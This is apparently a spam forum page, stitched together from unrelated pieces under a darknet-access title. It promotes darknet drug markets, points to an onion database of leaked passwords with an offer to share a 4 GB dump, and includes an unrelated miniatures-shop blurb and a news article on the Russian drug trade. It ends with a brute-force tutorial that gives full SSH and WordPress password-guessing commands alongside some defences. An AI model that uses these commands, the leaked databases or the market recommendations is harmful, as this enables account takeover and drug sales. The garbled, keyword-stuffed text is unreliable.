Как зайти на сайт рамп с компьютера

Salohe

Специалист
Подтвержденный
Сообщения
203
Реакции
39
Уважаемые пользователи RuTOR , Все сайты из нашего списка проверены и находятся онлайн, их нет в скам листах. Остерегайтесь фишинг сайтов и помните об уголовной ответственности за незаконные сделки. Подборка официальных сайтов по продаже веществ от форума Rutor носит исключительно информативный характер.

1. OMG!OMG - MOST ADVANCED DARKMARKET

Эта площадка существует довольно давно и в этот период она медленно развивалась в тени гидры. В настоящее время это ведущий сайт по продаже веществ в даркнете.
 

 

2. MEGA - DARKNET MARKET

Благодаря хорошей подготовке и листингу на зарубежных сайтах площадка смогла составить конкуренцию в стабильности и доступности, чего не смогли ее конкуренты, но все же она уступает по полпулярности площадке OMG!OMG!

 

3. HYDRA - Возрождение легенды.

Идут работы по восстановлению всеми любимой гидры, но все не так просто как казалось ранее, совсем скоро она будет доступна, а сейчас нам остается только ждать релиза от команды HYDRA.

 

________________________
RUTOR — Главная торговая и информационная площадка в сети Tor.



Zykub

Продвинутый юзер
Сообщения
25
Реакции
22
Как зайти на сайт рамп с компьютера
Belgian Infantry WaterlooDutch infantry WaterlooDutch Militia Waterloo Popular ProductsAll productsCampaign Game Minatures is the best place to find your figures and get a personal service second to none.We have 21 years ramppchela experience, our make of сайт figures called CGM and we stock makes such as Mirliton, Xyston, Perry Miniatures, Buaeda, Minairons, Victrix, Spanish Tercios, Black Scorpion, and 1-48 Tactica as well as the Bolt action ranges, games, books доверенных and rules, including our own Imperial Eagle with the Scenario book Borodino and the army lists for Eckmuhl. CGM figures include Napoleonic, Ancients with Cesaerian Roman, Imperial Roman and Gauls and also WW2 infantry. El Cid and his men are coming along with new Napoleonic figures and equipment like wagons.The web has been updated and e-mails are working so you can contact us and place orders. You get an invoice and a message when you order. If you have problems logging in to your account contact me at [email protected] the navigation catergories to find your way around.
 
O

Obibe

Пассажир
Сообщения
65
Реакции
13
OfftopicВы используете устаревший браузер. Этот и другие сайты могут отображаться в нём некорректно.
Вам необходимо обновить браузер или попробовать использовать другой.1 Май 2018Мой старый e-mail там тоже засветился. Годная штукенция. Если бы еще показывала, с какого именно сайта пароль снят  2 Май 2018Untonych написал(а):Мой старый e-mail там тоже засветился. Годная штукенция. Если бы еще показывала, с какого именно сайта пароль снят Нажмите для раскрытия...для таких случаев надо разные пароли делать на каждый сайт) 22 Май 2018Охренеть конечно, старый аккаунт там засветился, правда пароль я на нем менял уже давно. Годная база, но уже валида в ней ужасно мало. Очень интересно откуда они слили мой пасс) 22 Май 2018Subnull написал(а):Охренеть конечно, старый аккаунт там засветился, правда пароль я на нем менял уже давно. Годная база, но уже валида в ней ужасно мало. Очень интересно откуда они слили мой пасс)Нажмите для раскрытия...иногда ты можешь просто зайти на сайт, и сохраненные данные могут так спалится(но это не точно) 23 Май 2018Есть немного другая программа, называется Антипаблик. Там собраны где-то 95% всех паблик баз данных формата mailass. Вот там точно можно найти что-то стоящее. Проверено временем. 28 Май 2018sunder написал(а):Dumpedlezarfire — это база из 1 миллиарда 400 миллионов логинов и паролей учетных записей из баз сайтов, которые были взломаны и выложены в открытый доступ.
http://dumpedlqezarfife.onion/ (Tor)
Указываем email, никнейм человека или фамилию на латинице в форме и получаем список паролей, которые человек использовал на разных сайтах.Многие люди жутко ленивы (особенно когда это касается запоминания и креатива) и используют везде одинаковые или очень похожие пароли: даты рождения близких людей в разных вариациях, имена супругов или домашних животных.
Если тебе лень открывать/скачивать Tor вот тебе полезный сайтец в помощь http://toronline.pw
P.S Все выше сказанное не является рекламой и т.д
Нажмите для раскрытия...Эта база в паблике плавает (4iq).
Если кому-то нужна (~4 gb в сжатом виде) пишите в личку, торрент вам скину. Последнее редактирование: 28 Май 201829 Май 2018Автор, отличная статья и ресурс полезный. Но у меня проблема, захожу на сайт, но меня не пускает туда. В чем может быть проблема? Toggle signature» bandit.
» ярый.29 Май 2018#Yarik написал(а):Автор, отличная статья и ресурс полезный. Но у меня проблема, захожу на сайт, но меня не пускает туда. В чем может быть проблема?Нажмите для раскрытия...Я думаю, твоя проблема в отсутствии мозга.
И невероятно большой лени. 29 Май 2018#Yarik написал(а):Автор, отличная статья и ресурс полезный. Но у меня проблема, захожу на сайт, но меня не пускает туда. В чем может быть проблема?Нажмите для раскрытия....onion это доменная зона в сети Tor. 29 Май 2018SemTheFreak написал(а):Я думаю, твоя проблема в отсутствии мозга.
И невероятно большой лени.Нажмите для раскрытия...А с чего это вдруг в мой адрес пошли оскорбления? Я тебе задал вопрос. Я захожу на ресурс который ты скинул, он грузится и не заходит. Включал VPN, использовал другие браузеры проблема осталась. Теперь тебе вопрос, объясни где ты увидел мою лень?
 
KobaST написал(а):.onion это доменная зона в сети Tor.Нажмите для раскрытия...Спасибо друг, помог. Toggle signature» bandit.
» ярый.31 Май 2018Примерно 12 лет грузился сайт. За это время забыл все пароли. Но я есть в базе - напомнили. Спасибо. Лайк автору Toggle signatureНе понравился мой пост - мне похер. Понравился мой пост - мне тоже похер.
Я здесь не за лайками. Я здесь чтобы хейтить вас.1 Июн 2018Фээээээк я там есть
 
И там мой пароль, правда старый 1 Июн 2018PBLACK написал(а):Фээээээк я там есть
 
И там мой пароль, правда старыйНажмите для раскрытия...Ну так не спроста ведь рекомендуется пароли меня периодически.
Если менять его раз в месяц хотя бы то подобные базы будут неактуальны, но люди слишком ленивы для этого. 1 Июн 2018KobaST написал(а):Ну так не спроста ведь рекомендуется пароли меня периодически.
Если менять его раз в месяц хотя бы то подобные базы будут неактуальны, но люди слишком ленивы для этого.Нажмите для раскрытия...Это да... Но у меня сейчас пароли такие, что только мне самому на мой акк будет зайти проблематично, так как там ~ 20 символов XD
 
Лул, валид нашёл со стимом. 1 Июн 2018Жесть конечно все старые пароли и аккаунты есть, особенно старичек с яндекса, которому уже больше 15ти лет, почти все пароли оттуда там есть. Toggle signatureУчастник разработки бота Adrenaline (Shadow), D2 JS.
skype - live:ivanius511 Июн 2018Ну что пасаны, пошли брутфорсить? Toggle signatureBy Koka1 Июн 2018Toggle signatureВ рот я ебал ваш первый канал!Сверху Снизу
Как зайти на сайт рамп с компьютера
 
K

Kenylu

Пассажир
Сообщения
82
Реакции
2
С 5 апреля, после того, как стало известно об изъятии серверов omg, российские соцсети, посвященные вопросам наркоторговли, переполнены паническими сообщениями и обсуждениями дальнейших вариантов событий. Спустя более чем две недели после закрытия крупнейшего в мире наркомаркета почти ни у кого не осталось сомнений в том, что площадка не сможет возобновить свою работу.Главная новость по темеНемецкие силовики заявили о закрытии крупнейшего русскоязычного даркнет-рынка omg MarketНа самую популярную просьбу в тематических чатах: «Скиньте ссыль на проверенный (нарко) магаз» пользователи чаще всего отвечают, что приобретение запрещенных веществ на мелких площадках чрезвычайно опасно. Дело не только в вероятности мошенничества (заплатить и остаться без товара), но и в потенциальном риске «засветиться» перед силовиками.«Покупать на площадках, которые предлагают как замену гидры, максимально опасно. ОМГ сотрудничала с теми, кто свыше и все было [хорошо], никого не накрывали всем было [хорошо] (кроме тех, кто покупал опт). А щас вот эти маленькие маркетплейсы полюбас чекаются всеми подряд, и у всех есть доступ. Уже домены точно», — объясняет один из пользователей.Те из наркопотребителей, кто все-таки рискует приобретать вещества, отмечают снижение качества закладок — наркотиков в тайниках. «Вернулись времена прикопов в клумбы в черной изоленте, куры вообще не парятся, от слова совсем», — сообщает другой потребитель.Очень часто посетители таких форумов пишут о возврате схемы из 90-х — покупке наркотиков непосредственно «из рук в руки». Из-за понятных рисков такая схема ведет к увеличению стоимости «товара».Впрочем, на цене на наркотики сказалась и общая ситуация в мире. Введение санкций против России осложнило поставку крупных партий наркотиков и составляющих для их производства. Все опрошенные 66.RU на условиях анонимности свердловские силовики, связанные с борьбой с наркотиками, отмечают падение оборота запрещенных веществ.«Сегодня у продавцов есть три основные проблемы: отсутствие зарекомендовавшей себя площадки, через которую можно вести продажу, нехватка закладчиков и напряженка с сырьем. Оно закупалось через omg. Мы наблюдаем, что в среднем сбыт упал на 20–30%», — рассказал 66.RU информированный собеседник в погонах.Силовики отмечают, что наибольшим спросом в Свердловской области пользовался мефедрон. На него приходилось до 80% изъятий. При этом мефедрон относится к числу тех веществ, что опытные химики могут произвести самостоятельно из закупленных компонентов. Однако разрыв логистических цепочек, связанный как с санкциями, так и с ликвидацией omg, привел к тому, что подпольные нарколаборатории испытывают серьезные трудности с сырьем.«Сложилась ситуация, когда есть гигантский ажиотаж, но магазины не могут удовлетворить спрос. Наиболее крупные площадки работают над тем, чтобы увеличить свой оборот, но они не смогут раскрутиться больше 5–10%. Наркорынок восстановится, когда откроется что-то подобное omg. Но в данный момент я не вижу такого игрока», — поделился с 66.RU сотрудник свердловской полиции.Еще одной причиной сложившейся ситуации на наркорынке России силовики называют то, что работа ряда магазинов курировалась с территории Украины. После начала спецоперации их деятельность существенно осложнилась.«Мы периодически задерживали граждан Украины. Одну из последних женщину взяли под Первоуральском. Она ночью с фонариком по лесу закладки раскладывала. Нам еще объясняла, что просто гуляет. Украинцы сюда приезжали подзаработать закладчиками», — уточняет источник 66.RU.Задержание самого крупного наркосиндиката «ХимПром», состоящего из граждан Украины, начался с Екатеринбурга. В 2016 году свердловские оперативники задержали первого украинца в уральской столице. Через него, по цепочке, удалось выйти на 67 членов наркосообщества.«Группировка действовала более чем в 10 регионах России. Синдикат «ХимПром» имел четкую схему оборота наркотиков. Его годовой оборот составлял 2 млрд руб.», — сообщала тогда представитель МВД РФ Ирина Волк.Глава фонда «Город без наркотиков» Тимофей Жуков считает, что наркорынок не сможет быстро восстановиться. «Закрытие omg — это, конечно, класс! Но ведь никуда не делись сервисы VPN, даркнет продолжает работать, есть все инструменты, чтобы криминальный мир восстановил свою работу. Но я уверен, что в течение года-полугода мы будем наблюдать снижение оборотов наркотиков», — заявил Жуков.
 
A

Acarup

Пассажир
Сообщения
118
Реакции
2
Brute-force (атака полным перебором) – метод решения математических задач, сложность которого зависит от количества всех возможных решений. Сам же термин brute-force обычно используется в контексте хакерских атак, когда злоумышленник пытается подобрать логин/пароль к какой-либо учетной записи или сервису.Рассмотрим инструменты, которые можно использовать для выполнения brute-force атак на SSH и WEB-сервисы, доступные в Kali Linux (Patator, Medusa, omg, Metasploit), а также BurpSuite.

Все материалы, предоставленные в рамках данной статьи, предназначены для использования исключительно в учебных целях. Использование материалов в противоправных и противозаконных запрещено.

Brute-force SSH
Для примера возьмем тестовую машину 192.168.60.50 и попробуем подобрать пароль пользователя test по SSH. Мы будем использовать популярные пароли из стандартного словаря rockyou.txt.
Patator
Для подбора пароля средствами Patator используем команду:patator ssh_login host=192.168.60.50 user=test password=FILE0 0=/root/wordlist -x ignore:mesg=’Authentication failed’где:
ssh_login — необходимый модуль
host – наша цель
user – логин пользователя, к которому подбирается пароль или файл с логинами для множественного подбора
password – словарь с паролями
-x ignore:mesg=’Authentication failed’ — команда не выводить на экран строку, имеющую данное сообщение. Параметр фильтрации подбирается индивидуально.
omg
Для подбора пароля используя omg выполним команду:omg -V -f -t 4 -l test -P /root/wordlist ssh://192.168.60.50где:
-V – показывать пару логин+пароль во время перебора
-f – остановка как только будет найден пароль для указанного логина
-P – путь до словаря с паролями
ssh://192.168.60.50 – указание сервиса и IP-адрес жертвы
Medusa
Для подбора пароля с использованием Medusa выполним команду:medusa -h 192.168.60.50 -u test -P /root/wordlist -M ssh -f -v 6где:
-h – IP-адрес жертвы
-u – логин
-P – путь к словарю
-M – выбор модуля
-f – остановка после нахождения валидной пары логин/пароль
-v – настройка отображения сообщений на экране во время процесса подбора
Metasploit
Произведем поиск инструмента для проведения brute-force атаки по SSH:
search ssh_login и получили ответ:Задействуем модуль:use auxiliary/scanner/ssh/ssh_loginДля просмотра необходимых параметров, воспользуемся командой show options. Для нас это:
rhosts – IP-адрес жертвы
rport – порт
username – логин SSH
userpass_file – путь до словаря
stop_on_success – остановка, как только найдется пара логин/пароль
threads – количество потоковУказание необходимых параметров производится через команду "set".set rhosts 192.168.60.50
set username test
set userpass_file /root/wordlist
set stop_on_success yes
set threads 4
set rport 22Указав необходимые параметры набираем команду "run" и ждем.Противодействие
Ограничить количество устанавливаемых соединений с использованием межсетевого экрана. Пример настройки iptables:-A INPUT -i eth0 -p tcp --dport 22 -m connlimit --connlimit-above 1 --connlimit-mask 32 -j REJECT --reject-with tcp-reset.Такое правило установит ограничение доступа к SSH для каждого IP-адреса до 1 соединения в секунду, значительно усложнив перебор. Также эффективным решением может быть использование двухфакторной аутентификации (например, используя eToken) или аутентификации с использованием ключевой пары, а также использование ACL на основе IP-адресов.Brute-force WordPress
Рассмотрим другой пример — подбор пароля окна авторизации веб-формы.Для примера будем подбирать пароль от учетной записи администратора wordpress.
BurpSuite
Для начала нам необходимо понять, как происходит процесс авторизации. Для этого мы будем использовать BurpSuite. Нам необходимо попробовать авторизоваться с любым паролем и логином, чтобы посмотреть какие запросы проходят через BurpSuite.Отлично, мы увидели POST запрос для авторизации с ним мы и будем работать.
В BODY указано какой логин и пароль проверялись, а значит, мы можем попробовать самостоятельно подставить нужные нам значения.
Передаем этот запрос в Intruder и там выбираем необходимые параметры для атаки. В пункте Payload Positions тип атаки оставляем sniper, но для проверки оставляем только параметр pwd. Таким образом, при атаке будет изменяться только этот параметр.Загружаем необходимый словарь и начинаем атаку.Из поведения веб-приложения мы видим, что неверный пароль возвращает код ответа 200. После перебора словаря, видим, что один из паролей дал ответ с кодом 302 — он и является верным.Данный метод перебора занимает намного больше времени, чем при использовании Patator, omg, Medusa и т.д. Даже с учетом того, что мы взяли небольшой словарь, BurpSuite перебирал словарь около 40 минут.
omg
Попробуем подобрать пароль с помощью omg.
Как мы уже знаем, при неверной авторизации возвращается код 200, а при успешной – 302. Попробуем использовать эту информацию.
Для запуска используем команду:omg -V -f -l admin -P /root/wordlist -t 4 http-post-form://192.168.60.50 -m "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.60.50%2Fwp-admin%2F&testcookie=1:S=302"Здесь мы указываем обязательные параметры:
-l – имя пользователя
-P – словарь с паролями
-t – количество потоков
http-post-form – тип формы, у нас POST.
/wp-login.php – это URL страницы с авторизацией
^USER^ — показывает куда подставлять имя пользователя
^PASS^ — показывает куда подставлять пароль из словаря
S=302 – указание на какой ответ опираться omg. В нашем случае, ответ 302 при успешной авторизации.
Patator
Как мы уже знаем, при неудачной авторизации возвращается код 200, а при удачной – 302. Будем использовать тот же принцип, что и с omg:
Запуск производится командой:patator http_fuzz url=http://192.168.60.50/wp-login.php method=POST body='log=admin&pwd=FILE0&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.60.50%2Fwp-admin%2F&testcookie=1' 0=/root/wordlist -t 4 before_urls=http://192.168.60.50/wp-login.php -x ignore:code=200 accept_cookie=1http_fuzz – модуль для brute-force атаки http
url – адрес страницы с авторизацией
FILE0 — путь до словаря с паролями
body – информация, которая передается в POST запросе при авторизации
-t — количество потоков
-x – В данном случае мы указали команду не выводить на экран сообщения строки, содержащие параметр с кодом 200
accept_cookie – сохранение параметра cookie и передачи его в следующий запрос
Как итог – нам удалось подобрать пароль.
Nmap
Утилита Nmap позволяет в том числе производить подбор паролей для веб-форм авторизации, если использовать скрипт http-wordpress-brute с соответствующими аргументами:
--script-args – добавление аргументов
user или userdb – логин или файла с логинами
pass или passdb — указание пароля или словаря
thread – количество потоков
firstonly=true – выводить результат после первого же правильного пароляnmap 192.168.60.50 --script http-wordpress-brute --script-args 'user= admin,passdb= /root/wordlist, http-wordpress-brute.thread=3, brute.firstonly=true'Противодействие
Ограничить (усложнить) brute-force атаки на web-приложения можно средствами iptables (по аналогии с SSH) и средствами nginx. Для этого необходимо создать зону лимитов:
...
limit_req_zone $binary_remote_addr zone=req_limits:10m rate=30r/s;
...

и задействовать ее:
location / {
...
limit_req zone=req_limits burst=10;
limit_req_status 429;
...
}

Такие настройки позволят ограничить количество запросов с одного IP-адреса до 40 в секунду.Усложнить задачу перебора можно используя следующие методы:
— Применение межсетевого экрана и прочего ПО для ограничения количества обращений к защищаемому сервису. О том, как мы используем машинное обучение для выявления подобных атак (в том числе распределенных), можно почитать в статье.
— Использование средств, препятствующих быстрой проверке корректности ключа (например, Captcha).Заключение
В данной статье мы поверхностно рассмотрели некоторые популярные инструменты. Сократить риск подбора пароля можно, следуя следующим рекомендациям:
— используйте устойчивые к подбору пароли;
— не создавайте пароли, используя личную информацию, например: дату рождения или имя + дата рождения или мобильный телефон;
— регулярно меняйте пароль;
— на всех аккаунтах применяйте уникальные пароли.Подобные рекомендации (как и рекомендации по безопасной веб-разработке) мало кто соблюдает, поэтому необходимо использовать различные программные решения, позволяющие:
— ограничить подключение по IP-адресу, или, если это невозможно, ограничить одновременное количество соединений с сервисом (средствами iptables, nginx и прочими);
— использовать двухфакторную аутентификацию;
— выявлять и блокировать подобные атаки средствами SIEM, WAF или другими (например, fail2ban).
 

Похожие темы

  • Udulu
  • 10 Окт 2021, 07:27
  • Ypuco
  • 10 Окт 2021, 11:41
  • Uwibudek
  • 10 Окт 2021, 08:54
Сверху Снизу